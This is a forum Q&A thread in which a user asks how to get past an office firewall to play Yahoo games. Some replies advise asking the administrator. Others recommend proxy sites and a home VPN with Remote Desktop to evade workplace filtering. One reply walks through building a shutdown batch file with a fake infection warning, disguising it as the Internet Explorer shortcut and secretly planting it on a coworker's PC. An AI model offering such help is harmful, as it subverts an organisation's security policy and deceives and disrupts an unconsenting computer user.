We have firewall in the office and i can't play yahoo games in the net. Is there a way 2 disable the firewall?

I'm not sure whether there is a way to disable the firewall, but I also have the same problem at school. I have found a handy trick of getting around this tho!

Using a proxy site, which means you can browse anonymously! They get blocked often but theres plenty out there, google>proxy site, its as easy as that.

Currently: 'rapidwire.net' works!

Allowing you to play games on Yahoo, requires your Network administrators to change the security policies they have set for the firewall. I believe they deliberately blocked your access to Yahoo games so that you could spend less time on the Internet, and get more work done. But if that isn't the case (which I doubt) , you could ask them to loosen the security policy.

No there is not, there is no UN-blocker that will unblock them as they usually require Java to run.

you will need to get the Administrator to unblock the site and change the settings.

I just have one question for you, shouldn't you be doing work in the office?

i agree w/the person above there is no unblocker but there sure as hell a way to get around the block i have 2 suggestions 1) Proxys if your going to use a proxy i recomend making your own proxy sever since alot of proxy severs are being blocked these days (by the way any proxys you search for on google will be blocked) in fact most of the time what the blocker does is look for key words like at schools they put in word to block for like myspace or proxy so if the blocker sees a word similar to it or the word it will block it so when your making a website w/the proxy just put the input bar and the go button (you might have to learn some html and asp) and don't get a domain just use the ip add. of the sever that for setting up the sever ur on ur own im only 12 and im saving up for enough parts to build a sever (quadcore xeon processor) 2) Logmein,RDC,GoToMyPC, do some research on logmein, remote desktop conection, and Go To My PC. what happen w/Logmein is you go to there website and log in and it basicaly you have ur home desktop on the browser the only things is if the website is blocked you cant use it , if that doesn't work this plan is basicly can't fail this is what my dad does to connect to his pc at work since he's a DBA anyways get a net work router that has VPN features enable the VPN and conect all the computers in your house together on a network make sure the computer your going to connect to is on when you leave for work and make sure that Remote Desktop Connection is enabled on that PC also setup a guest account on that PC now at work download a vpn client to your work PC and fire up the program it will probaly ask for for an ip add. and the port # but im not that firmilyar w/it it might ask for a domian i dont know but you should of found out during the vpn setup w/the router and it will ask for the password which you should of setup in the router back at home anyways if every thing goes right you are now virtualy in your home network ( VPN stands for Virtualy Private Network) now open up Remote Desktop Conection get the ip address of the PC your gona be connecting to if everything goes right you'll now be in a window w/your home desktop where you can go to internet explorer and not be blocked the last one is Go To My PC if i were you i wouldn't use it since you have to pay for it (you also have to pay for logmein) and last ima show you how to really piss off you co-wokers for this you need to have acess to there computer i suggest you have a usb flash dirve anyways before you do it you need to prepare first you need to make the batch file and the guy's PC who ur gona be pissin off has to have windows xp IE 6.0 and now first make the batch file go into note pad and type
shutdown -s -c"type what ever you want here" -t ??
before saving it replace the ?? with a number like 60 thats how many seconds it will wait before shutdown
also when its counting down you can give him a message like "you PC has been infected" just put it in the "" next to the
-c now save it as Internet_Explorer.bat and put in your usb flash drive now do a test run and double click it if it worked then it will say you PC will shutdown in a window and be counting down don't worry go to run type cmd and comand prompt will come up type in
shutdown -a
that will abort the program
now that it works wait till your friend goes to the restroom junp in his cubicle popin ur flash drive put the internet explorer icon in the recycle bin and put the Internet_Explorer.bat in that person's C drive make a short cut to the desktop go to the desktop find the short cut and rename it to
Internet Explorer then right click on the icon and go to properties in the shortcut tab click on the change icon button there might be something that asks for an ok press ok
then find the IE 6.0 icon and select it now put it where the old internet explorer icon was and make a quick escape now every time he starts intenet explorer it shuts down his PC have fun
